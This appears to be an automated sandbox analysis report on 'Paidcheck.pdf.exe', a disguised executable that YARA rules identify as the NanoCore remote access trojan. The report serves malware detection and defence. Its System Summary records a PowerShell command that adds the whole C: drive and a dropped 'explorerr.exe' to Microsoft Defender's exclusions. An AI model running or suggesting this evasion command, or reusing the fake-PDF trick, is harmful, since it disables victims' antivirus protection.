      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
      Source: powershell.exe, 0000000B.00000003.373704213.00000000055FF000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
      Source: Paidcheck.pdf.exe, 00000000.00000002.305273244.0000000000E70000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
      Source: RegAsm.exe, 0000000A.00000002.486028172.0000000003C21000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

      E-Banking Fraud:

      barindex
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 10.2.RegAsm.exe.5f60000.23.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3c3dc19.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3c395f0.11.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3c69950.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.5f64629.22.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.5f60000.23.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3c395f0.11.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3c24c35.9.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3c91970.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3ce1990.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3c69950.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3c91970.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3eceb18.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3d596b5.14.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3d4d481.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3e36bd0.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3d6dce2.13.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3ce1990.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0000000A.00000002.486028172.0000000003C21000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.480862241.0000000002BD1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.486159057.0000000003C9E000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: Paidcheck.pdf.exe PID: 4608, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 10.2.RegAsm.exe.6aa0000.26.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6af0000.31.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6540000.24.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b20000.33.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6540000.24.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.5f60000.23.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3c3dc19.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b3e8a4.34.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6a60000.25.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3c395f0.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3bd9930.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6ac0000.28.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3d4d481.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.6af0000.31.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3f1807f.17.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3f1807f.17.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.2c6410c.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6ae0000.30.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3bd9930.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3d596b5.14.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b30000.36.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3f20eae.16.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b00000.32.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b34c9f.35.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6a60000.25.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b00000.32.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3f2f2de.15.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6ab0000.27.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.5cf0000.20.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3f20eae.16.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6ab0000.27.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.3f1807f.17.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.6ac0000.28.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.5f64629.22.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.5f60000.23.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b20000.33.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6ad0000.29.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3bde5cf.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3f2f2de.15.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.2c06b78.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.2c57ec4.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.3c395f0.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b70000.37.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3c24c35.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3c91970.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3c91970.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0.2.Paidcheck.pdf.exe.3ce1990.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3ce1990.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.6ae0000.30.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3be81d4.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b30000.36.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b70000.37.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3c91970.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3c91970.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0.2.Paidcheck.pdf.exe.3eceb18.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3eceb18.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.2c6410c.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.2c6410c.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.3d596b5.14.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.2c78748.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.2c78748.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.2c57ec4.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.2c57ec4.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0.2.Paidcheck.pdf.exe.3e36bd0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3d4d481.12.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0.2.Paidcheck.pdf.exe.3e36bd0.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.3d6dce2.13.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0.2.Paidcheck.pdf.exe.3ce1990.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3ce1990.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.489612567.0000000006AF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.489824086.0000000006B70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.489650753.0000000006B00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000000.00000002.306467262.0000000002F7B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000000.00000002.306467262.0000000002F7B000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000A.00000002.489080890.0000000006540000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000A.00000002.489200537.0000000006A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000A.00000002.489750000.0000000006B30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.489515474.0000000006AC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.489556083.0000000006AD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.489421921.0000000006AB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.487959642.0000000005CF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.489379501.0000000006AA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.489724934.0000000006B20000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.486430040.0000000003EBC000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000A.00000002.486159057.0000000003C9E000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: Paidcheck.pdf.exe PID: 4608, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: Paidcheck.pdf.exe PID: 4608, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Initial sample is a PE file and has a suspicious nameShow sources
      Source: initial sampleStatic PE information: Filename: Paidcheck.pdf.exe
      Wscript starts Powershell (via cmd or directly)Show sources
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe'
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe'
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_006A29C0
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_00E5C204
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_00E5E5C0
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_00E5E5D0
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF963C
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF00FB
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF012D
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_0733FC48
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_07B28180
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_006A2050
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_00763DFE
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_065402B0
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_029BE480
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_029BE471
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_029BBBD4
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_05096550
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_0509CFB0
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_05093E30
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_0509C398
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_05094A50
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_0509D06E
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_05094B08
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_0509BA27
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_0509D2E8
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_06CC9C90
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_06CCA5F0
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_06CC2D10
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_06CC1818
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_06CC276E
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_06CC24EE
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_06CC2430
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_06CCE27A
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_06CC9910
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_06CC4921
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_070507D8
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_00CA3DFE
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 19_2_002A3DFE
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 21_2_008A3DFE
      Source: Paidcheck.pdf.exe, 00000000.00000002.305273244.0000000000E70000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Paidcheck.pdf.exe
      Source: Paidcheck.pdf.exe, 00000000.00000003.303465052.0000000003FEB000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameQjisrzmpsmlj.dll" vs Paidcheck.pdf.exe
      Source: Paidcheck.pdf.exe, 00000000.00000003.303229105.000000000739C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameConsoleApp18709999999999999999.exeN vs Paidcheck.pdf.exe
      Source: Paidcheck.pdf.exe, 00000000.00000002.319081294.00000000072F0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs Paidcheck.pdf.exe
      Source: Paidcheck.pdf.exe, 00000000.00000002.319081294.00000000072F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs Paidcheck.pdf.exe
      Source: Paidcheck.pdf.exe, 00000000.00000002.318898900.0000000007290000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs Paidcheck.pdf.exe
      Source: Paidcheck.pdf.exe, 00000000.00000002.305879453.0000000002C21000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs Paidcheck.pdf.exe
      Source: Paidcheck.pdf.exe, 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameIureehicuwdmdjhbahb.dllH vs Paidcheck.pdf.exe
      Source: Paidcheck.pdf.exeBinary or memory string: OriginalFilenameConsoleApp18709999999999999999.exeN vs Paidcheck.pdf.exe
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeSection loaded: sfc.dll
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeSection loaded: sfc.dll
      Source: Paidcheck.pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
